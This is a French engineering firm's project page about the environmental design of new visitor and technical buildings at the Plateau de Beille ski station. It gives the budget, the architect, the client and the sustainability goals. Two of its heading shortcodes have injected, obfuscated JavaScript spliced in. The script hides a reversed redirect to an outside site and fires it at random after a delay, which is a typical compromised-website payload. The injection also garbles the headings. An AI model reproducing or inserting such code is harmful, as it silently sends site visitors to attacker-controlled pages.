[wpc_custoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom_heading heading= »Spécifications » colored_line= »yes » size= »medium »]

Lieu : Plateau de Beille (09)
SHON :   m²
Montant des travaux : 5 450 000 € HT
Mission réalisée : Maîtrise d’œuvre Environnementale

Architecte : TRYPTIQUE
Maître d’Ouvrage : Communauté de communes de la Haute-Ariège (CCHA)
Année : Début études Décembre 2019

[wpc_custoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tom_heading heading= »Information sur le projet » colored_line= »yes » size= »medium »]

L’opération s’inscrit dans un projet de développement et de diversification de la station du plateau de Beille, au niveau des infrastructures, qui devraient se traduire par une augmentation de la fréquentation du site. Cette hausse de l’affluence va nécessiter une adaptation des bâtiments d’accueil, de services, des bâtiments techniques et de l’aménagement urbain environnant.

Associé au cabinet d’architectures TRYPTIQUE, F4 INGENIERIE a été nommé lauréat du concours.

Le projet a été pensé pour favoriser l’orientation Nord/Sud afin d’optimiser les apports solaires pour en profiter au maximum en hiver et s’en protéger facilement en période estivale.

En composant avec la volonté de privilégier les matériaux bio-sourcés comme matériaux de construction et notamment le bois, l’équipe de Maîtrise d’œuvre a complété le projet avec des matériaux à forte inertie thermique et le principe d’isolation par l’extérieur.

Le projet s’inscrit dans une démarche Bâtiments Durables Occitanie visant le niveau Argent. Également, il répond à l’appel à projet NoWatt de la région Occitanie et suit le label Energie-Carbone prémisse de la future Réglementation Environnementale 2020.